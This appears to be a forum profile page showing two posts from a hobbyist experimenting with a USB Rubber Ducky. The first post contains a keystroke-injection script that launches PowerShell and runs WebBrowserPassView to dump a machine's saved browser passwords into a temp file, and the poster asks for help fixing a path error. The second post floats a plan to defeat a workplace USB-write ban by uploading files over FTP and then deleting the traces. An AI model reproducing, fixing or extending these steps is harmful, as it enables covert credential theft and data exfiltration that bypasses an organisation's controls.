Jump to content

MichaelV

Members
  • Posts

    3
  • Joined

  • Last visited

Posts posted by MichaelV

  1. When I execute line by line to test if the script is working I do get a result, but when I try to execute it as a inject.bin I get a powershell error

    Error 3: The system cannot find path specified

    I want to use the WebBrowserPassView to save the result in user's temp directory:

     

    DELAY 1000
    GUI R
    DELAY 100
    STRING powershell
    ENTER
    DELAY 500
    STRING $usbpath = Get-WMIObject win32_Volume | ? { $_.Label -eq '_' } | select name
    ENTER
    DELAY 100
    STRING Set-Variable -Name "profile" $env:USERPROFILE\AppData\Local\Temp
    ENTER
    DELAY 100
    STRING cd $usbpath.name
    ENTER
    DELAY 100
    STRING ./WebBrowserPassView.exe /stext $profile\temp.txt
    ENTER
    DELAY 100
    STRING exit
    DELAY 100
    ENTER

    Can someone help me in this one?

  2. Hi guys,

    Recently I received a Ducky and started to experiment on it.

    The issue that I encountered is that though there is an ability to read and execute the script, what is the solution if my USB drive is disable to write to?

    I started thinking about this issue since in my workplace the USB drive is disable (on Admin level), so I cannot "backup" documents or save any data to SD card

    I was thinking that the only solution is to execute script that will make a temp files > open FTP connection -> upload the files > deletes the files from the Temp location.

     

    Has anyone tried to execute something like that?

    Thanks

×
×
  • Create New...